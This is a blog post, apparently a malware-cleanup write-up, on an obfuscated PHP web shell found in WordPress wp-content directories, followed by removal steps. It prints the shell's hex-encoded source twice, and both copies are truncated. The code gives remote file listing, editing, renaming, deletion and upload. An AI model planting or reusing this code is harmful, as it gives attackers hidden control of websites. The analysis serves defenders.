DEV Community

MD Pabel
MD Pabel

Posted on • Originally published at mdpabel.com on

Malicious PHP Code Injection in WordPress Directories

#cybersecurity #php #security #wordpress

Technical Analysis

I discovered malware in multiple folders within the wp-content directory of a WordPress site. The affected directories include:

  • wp-content/themes/wk
  • wp-content/plugins/wk
  • wp-content/
  • wp-content/uploads
  • wp-content/mu-plugins

The malware also modified directory permissions to 555, preventing modifications.

Code Analysis

The injected code was found in a file named index.php with the following details:

<?php
class nigwqgqwtqwtqwt{
    public function nigwqgqwtqwtqwti(){
        $list = "73657373|696F|6E5F73|746172|7428|293B|68656164|65722822|582D58|53532D|50726F|74656374|69|6F6E|3A|20302229|3B6F62|5F7374|617274|28293B73|65|745F|7469|6D65|5F6C69|6D69|74283029|3B657272|6F725F|7265|706F72|7469|6E6728|30293B|69|6E695F73|657428|2764|697370|6C6179|5F657272|6F|727327|2C20|4641|4C5345|293B|0A2469|73416A61|78203D20|69|7373|65|7428|245F|5345|5256|45|525B2748|54|54|505F|58|5F5245|51|5545|535445|445F|5749|544827|5D2920|0A2020|2020|20|202020|20|26262073|7472|746F6C6F|776572|2824|5F|5345|5256|45525B|2748|5454|505F|585F5245|51554553|5445445F|57495448|275D2920|3D3D|3D2027|786D|6C687474|707265|7175|65737427|3B|0A|0A66756E|637469|6F6E2068|657828|246E|29207B|0A20|202020|24793D|27273B|0A|20|20202066|6F7220|2824|693D|303B20|2469203C|2073|74|726C65|6E2824|6E|293B2024|69|2B|2B|297B0A20|20|2020|20202020|2479|202E3D|20646563|686578|28|6F72|64|2824|6E|5B|24695D29|293B0A|20202020|7D0A2020|20|20726574|75726E20|24793B|0A7D0A66|75|6E637469|6F6E|207568|65|7828|24|79|2920|7B|0A2020|20|20246E3D|2727|3B|0A202020|20|666F7220|282469|3D303B|2024|69203C20|73|74|72|6C|656E|28247929|2D31|3B20|24|692B3D|32297B|0A202020|202020|2020246E|20|2E3D|20636872|28686578|64656328|24|795B24|695D2E24|795B|24|69|2B31|5D2929|3B0A|202020|207D0A|202020|20|726574|75726E|20246E3B|0A7D|0A|696620|286973|73|65742824|5F4745|545B22|64225D|2929207B|0A2020|20202464|20|3D|2075|68|6578|28245F|47|45545B|2264|225D293B|0A202020|20|6966|2028|69|735F|64|69722824|642929|207B0A|2020|20202020|20|2063|68646972|28246429|3B0A2020|20|207D|20656C|7365|207B0A|202020|20202020|20|246420|3D206765|7463|77642829|3B0A2020|20207D|0A|7D|20656C|736520|7B0A2020|20|2024|6420|3D206765|7463|776428|293B0A7D|0A66756E|63|7469|6F6E|20736574|466C61|73|682824|7374|617475|73|2C20|24|6D736729|207B|0A202020|20245F53|45535349|4F4E5B|27|73746174|75|73275D|203D|20247374|617475|733B0A|20202020|24|5F5345|5353494F|4E|5B276D|73|6727|5D203D20|246D|73|67|3B0A|7D0A6966|20|286973|73|65|742824|5F|4745|54|5B27|616A6178|275D|29|2026|2620245F|4745545B|2761|6A61|7827|5D|203D3D|203129|207B0A20|2020203F|3E0A2020|20203C74|6162|6C653E0A|20|202020|202020|203C|74686561|643E0A20|202020|202020|20202020|203C74|723E|0A|2020|202020|20202020|20|20202020|20203C74|683E4E61|6D65|3C|2F74683E|0A20|202020|202020|2020|20202020|20|20203C|74683E53|69|7A653C|2F74|68|3E0A20|2020|20202020|2020|20202020|2020|20|3C7468|3E416374|696F6E|733C2F74|683E|0A20|2020|2020|20|202020|202020|3C2F|7472|3E0A2020|20202020|2020|3C|2F|74686561|64|3E|0A20|202020|202020|203C7462|6F64|793E0A|2020|20|20|20202020|3C3F70|68700A20|202020|20|2020|2024656E|74|7269|65|7320|3D20|736361|6E646972|28246429|3B0A|20|20202020|2020|20246469|72|4C|6973|7420|3D|205B5D3B|0A20|202020|20|20202024|66|696C654C|69737420|3D205B5D|3B0A2020|202020|20202066|6F|7265|616368|20|282465|6E747269|65|73206173|2024656E|747279|29207B0A|20|202020|20|20|20|202020|2020|696620|282465|6E747279|203D|3D2027|2E27|207C7C|202465|6E74|7279|203D|3D2027|2E2E2729|2063|6F6E|7469|6E75653B|0A20|202020|20|2020|2020|20202024|70617468|203D|2024|64|202E20|444952|4543544F|52595F|53|455041|524154|4F5220|2E2024|656E74|72793B0A|2020|2020|2020|20|202020|2020|696620|28|69735F64|69|722824|706174|682929|207B|0A20|20|20|202020|202020|202020|20202020|246469|724C6973|745B|5D203D20|24656E|7472793B|0A|20202020|20202020|20202020|7D|20656C73|6520|7B0A2020|202020|20202020|20|20202020|2020|246669|6C654C69|73|74|5B|5D20|3D|20|24656E|747279|3B0A2020|20202020|20|20202020|207D0A|20202020|2020|20|20|7D0A2020|202020|20202066|6F|7265|616368|20|28246469|72|4C|69737420|61732024|656E7472|792920|7B|0A|20202020|20202020|202020|20247061|74|68203D|202464|202E2044|4952|4543544F|5259|5F53|4550|41|52|41|544F|52202E20|24656E74|72793B0A|202020|20202020|20202020|2065|63686F|20273C74|723E27|3B|0A20|20|2020|20|20|2020|20202020|6563686F|2027|3C|74|643E3C|612063|6C|61|73|733D22|616A61|7844|697222|20687265|663D223F|643D27|20|2E2068|6578|2824|706174|6829202E|2027|223E|27202E20|68746D6C|737065|636961|6C63|686172|732824|656E74|72792920|2E20273C|2F613E3C|2F|7464|3E27|3B0A20|2020|20202020|20|2020|202065|63686F|20273C74|643E|2D|3C|2F74|64|3E273B|0A202020|202020|20202020|20|20656368|6F|20273C74|643E3C2F|74643E|273B0A20|20202020|2020|20|20202020|656368|6F|20273C2F|74723E27|3B0A20|202020|2020|20|207D0A|2020|2020|20|20202066|6F7|6561|6368|20|2824|66696C|65|4C697374|206173|202465|6E|7472|7929207B|0A202020|20|20|20202020|20|20|20247061|746820|3D2024|64202E20|4449|52454354|4F52595F|5345|5041|524154|4F|52|202E2024|656E74|72|793B0A|2020|2020|202020|20|202020|206563|686F20|273C7472|3E273B|0A202020|202020|20202020|2020|65|6368|6F20273C|74|643E|27202E20|68746D6C|737065|63|69616C63|68|61|7273|28|24|656E74|7279|29202E20|273C2F74|643E27|3B0A|20202020|2020|20|2020|202020|6563|686F2027|3C74643E|27|202E|202869|735F66|696C65|2824|70617468|2920|3F2066|696C65|7369|7A|65282470|617468|2920|2E|20272062|797465|732720|3A20272D|27|29|20|2E20273C|2F|74643E27|3B0A|20202020|202020|202020|20|20656368|6F|20273C|74643E27|3B|0A20|2020|20|2020|2020|2020|20|206563|686F2027|3C6120|636C|61|73733D22|616A61|7845|6469|74|2220|68726566|3D22|3F616374|69|6F6E3D65|646974|2664|3D27|202E20|68657828|24|642920|2E|20|2726|6669|6C653D|27|202E|207572|6C656E63|6F|64|65|2824656E|74|72792920|2E20|27|223E45|646974|3C2F613E|207C2027|3B0A|202020|20|202020|20|20202020|20|20206563|686F20|273C|612063|6C|61|73733D22|616A61|78|5265|6E616D|652220|68726566|3D223F61|6374696F|6E3D72|65|6E616D|65|26643D27|20|2E|20|68|657828|24642920|2E202726|66|696C653D|27|202E20|75726C656E|636F|64|6528|24|656E|74|7279|29202E|2027|223E5265|6E616D|653C|2F613E|20|7C|20273B|0A2020|20|20|2020|202020|20|2020|6563686F|2027|3C612063|6C617373|3D|22616A|61784465|6C657465|2220|6872|65663D22|3F616374|696F6E3D|64|656C|65|7465|26643D27|20|2E20|68657828|24|642920|2E|20|2726|66|696C653D|27|202E2075|726C656E|636F|64|652824|65|6E747279|2920|2E202722|3E|44|656C|65|74|653C|2F613E|273B|0A20|20202020|20|20|202020|2020|65636F|20273C2F|74723E27|3B0A2020|20202020|20207D0A|20|2020|2020|2020|2020|203F3E|0A|20202020|20202020|3C2F|74|626F6479|3E0A|20|20|20203C|2F74|61|626C|65|3E|0A2020|20203C|3F7068|700A2020|20|20657869|743B0A7D|0A|0A|69662028|69|73|73657428|245F504F|5354|5B2762|656E6B|79|6F27|5D292026|2620|69737365|742824|5F|504F53|545B27|6461|6B|656A61|275D29|29207B0A|202020|2024|66696C65|4E|616D6520|3D|20245F|504F|53|545B2762|65|6E6B|796F|275D3B0A|20202020|24656E|63|6F64|65|64436F6E|74|656E74|203D20|24|5F|504F53|545B2764|616B|656A61|275D3B|0A202020|20246465|636F6465|64436F6E|74656E|7420|3D20|68657832|62696E|2824656E|636F|646564|436F6E|74|656E7429|3B0A0A20|2020|20696620|282464|65636F64|65|64436F|6E|7465|6E74|20|3D3D|3D2066|616C7365|2920|7B0A20|20|20202020|20206966|202824|697341|6A617829|20|7B0A|20202020|20|2020|20202020|20|68656164|6572|28|27436F6E|74|656E74|2D54|7970653A|20|6170706C|696361|74|69|6F|6E2F|6A736F|6E27|293B0A|20|20202020|20|2020|202020|206563|686F|20|6A73|6F6E5F|65|6E|636F64|65285B27|737461|747573|27|203D3E|202766|6169|6C6564|272C2027|6D7367|27203D3E|2027496E|76616C69|64|20426173|653634|20656E|636F64|696E|67|275D|293B|0A20|20|20202020|20|207D|2065|6C|7365207B|0A2020|20|20202020|2020|20|202073|657446|6C61|7368|28|27666169|6C|656427|2C2027|496E76|616C|69642042|6173|65|3634|20656E63|6F|64|696E|67|2729|3B|0A|2020|20|2020|20|2020|

> **VirusTotal Analysis:** 🛡️ **Zero-Day / Fully Undetected.**

## Attack Chain

## Code Signature(s)

### FILE: `index.php`
Enter fullscreen mode Exit fullscreen mode


txt
<?php
class nigwqgqwtqwtqwt{
public function nigwqgqwtqwtqwti(){
$list = "73657373|696F|6E5F73|746172|7428|293B|68656164|65722822|582D58|53532D|50726F|74656374|69|6F6E|3A|20302229|3B6F62|5F7374|617274|28293B73|65|745F|7469|6D65|5F6C69|6D69|74283029|3B657272|6F725F|7265|706F72|7469|6E6728|30293B|69|6E695F73|657428|2764|697370|6C6179|5F657272|6F|727327|2C20|4641|4C5345|293B|0A2469|73416A61|78203D20|69|7373|65|7428|245F|5345|5256|45|525B2748|54|54|505F|58|5F5245|51|5545|535445|445F|5749|544827|5D2920|0A2020|2020|20|202020|20|26262073|7472|746F6C6F|776572|2824|5F|5345|5256|45525B|2748|5454|505F|585F5245|51554553|5445445F|57495448|275D2920|3D3D|3D2027|786D|6C687474|707265|7175|65737427|3B|0A|0A66756E|637469|6F6E2068|657828|246E|29207B|0A20|202020|24793D|27273B|0A|20|20202066|6F7220|2824|693D|303B20|2469203C|2073|74|726C65|6E2824|6E|293B2024|69|2B|2B|297B0A20|20|2020|20202020|2479|202E3D|20646563|686578|28|6F72|64|2824|6E|5B|24695D29|293B0A|20202020|7D0A2020|20|20726574|75726E20|24793B|0A7D0A66|75|6E637469|6F6E|207568|65|7828|24|79|2920|7B|0A2020|20|20246E3D|2727|3B|0A202020|20|666F7220|282469|3D303B|2024|69203C20|73|74|72|6C|656E|28247929|2D31|3B20|24|692B3D|32297B|0A202020|202020|2020246E|20|2E3D|20636872|28686578|64656328|24|795B24|695D2E24|795B|24|69|2B31|5D2929|3B0A|202020|207D0A|202020|20|726574|75726E|20246E3B|0A7D|0A|696620|286973|73|65742824|5F4745|545B22|64225D|2929207B|0A2020|20202464|20|3D|2075|68|6578|28245F|47|45545B|2264|225D293B|0A202020|20|6966|2028|69|735F|64|69722824|642929|207B0A|2020|20202020|20|2063|68646972|28246429|3B0A2020|20|207D|20656C|7365|207B0A|202020|20202020|20|246420|3D206765|7463|77642829|3B0A2020|20207D|0A|7D|20656C|736520|7B0A2020|20|2024|6420|3D206765|7463|776428|293B0A7D|0A66756E|63|7469|6F6E|20736574|466C61|73|682824|7374|617475|73|2C20|24|6D736729|207B|0A202020|20245F53|45535349|4F4E5B|27|73746174|75|73275D|203D|20247374|617475|733B0A|20202020|24|5F5345|5353494F|4E|5B276D|73|6727|5D203D20|246D|73|67|3B0A|7D0A6966|20|286973|73|65|742824|5F|4745|54|5B27|616A6178|275D|29|2026|2620245F|4745545B|2761|6A61|7827|5D|203D3D|203129|207B0A20|2020203F|3E0A2020|20203C74|6162|6C653E0A|20|202020|202020|203C|74686561|643E0A20|202020|202020|20202020|203C74|723E|0A|2020|202020|20202020|20|20202020|20203C74|683E4E61|6D65|3C|2F74683E|0A20|202020|202020|2020|20202020|20|20203C|74683E53|69|7A653C|2F74|68|3E0A20|2020|20202020|2020|20202020|2020|20|3C7468|3E416374|696F6E|733C2F74|683E|0A20|2020|2020|20|202020|202020|3C2F|7472|3E0A2020|20202020|2020|3C|2F|74686561|64|3E|0A20|202020|202020|203C7462|6F64|793E0A|2020|20|20|20202020|3C3F70|68700A20|202020|20|2020|2024656E|74|72|6965|7320|3D20|736361|6E646972|28246429|3B0A|20|20202020|2020|20246469|72|4C|6973|7420|3D|205B5D3B|0A20|202020|20|20202024|66|696C654C|69737420|3D205B5D|3B0A2020|202020|20202066|6F|72|6561|63682028|24|65|6E|747269|65|73|20617320|24656E|747279|29207B0A|20|202020|20|20|20|202020|2020|696620|282465|6E747279|203D|3D2027|2E27|207C7C|202465|6E74|7279|203D|3D2027|2E2E2729




## Indicators of Compromise (IOCs)

## Removal Protocol

1. 
  1. Remove all malicious files from the following directories: wp-content/themes/wk, wp-content/plugins/wk, wp-content/uploads, wp-content/mu-plugins.
2. 
  1. Change the permissions of the affected directories back to 755.
3. 
  1. Use a file integrity plugin to verify the WordPress installation and identify any other compromised files.
4. 
  1. Update all WordPress plugins, themes, and core files to the latest versions.
5. 
  1. Implement appropriate security measures, such as a firewall and malware scanner, to prevent future infections.

> **Status:** Active Threat.  
> **Verification:** Verified by MD Pabel.
Enter fullscreen mode Exit fullscreen mode

Top comments (0)